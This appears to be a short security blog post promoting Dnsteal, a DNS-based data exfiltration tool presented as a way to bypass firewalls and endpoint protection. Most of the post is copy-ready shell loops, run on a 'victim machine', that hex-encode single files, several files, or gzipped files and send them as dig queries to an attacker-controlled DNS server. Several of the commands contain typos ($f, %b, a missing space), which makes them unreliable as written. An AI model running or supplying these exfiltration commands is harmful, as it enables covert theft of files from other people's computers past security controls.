Data exfiltration, also called data extrusion, data exportation, or data theft is the unauthorized transfer of data from a computer or other device. Data exfiltration is primarily a security breach that occurs when an individual’s or organization's data is illegally copied. Generally, data exfiltration’s are targeted attacks where the hacker’s/cracker’s primary intent is to find and copy specific data from the target machine. Such a transfer may be manual and carried out by someone with physical access to a computer or it may be automated and carried out through malicious programming over a network. There are several methods for Data exfiltration but most of them will be blocked by the endpoint security systems and firewall/IPS implementations. A new tool has been released aiming primarily to bypass all such protections and transfer data through seemingly harmless DNS requests.
According to the author,Dnsteal is a Data Exfiltration Tool Through DNS Requests for stealthily sending files over DNS requests. Once setup and run successfully it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests
Dnsteal is coded in python and available in GitHub. The author gives an example on how to use this tool in the below image.
To begin with the following command should be entered on the victim machine :
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
Support for multiple filesDnstool supports multiple files to be exfiltereted. Use as below.
for filename in $(ls); do for b in $(xxd -p $f); do dig +short@server %b.$filename.com; done; done
gzip compression supported
It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:
python dnsteal.py 127.0.0.1 –z
Then on the victim machine send a Gzipped file like below:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
For multiple, gzip compressed files use as below:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done
For more details head over to GitHub page https://github.com/m57/dnsteal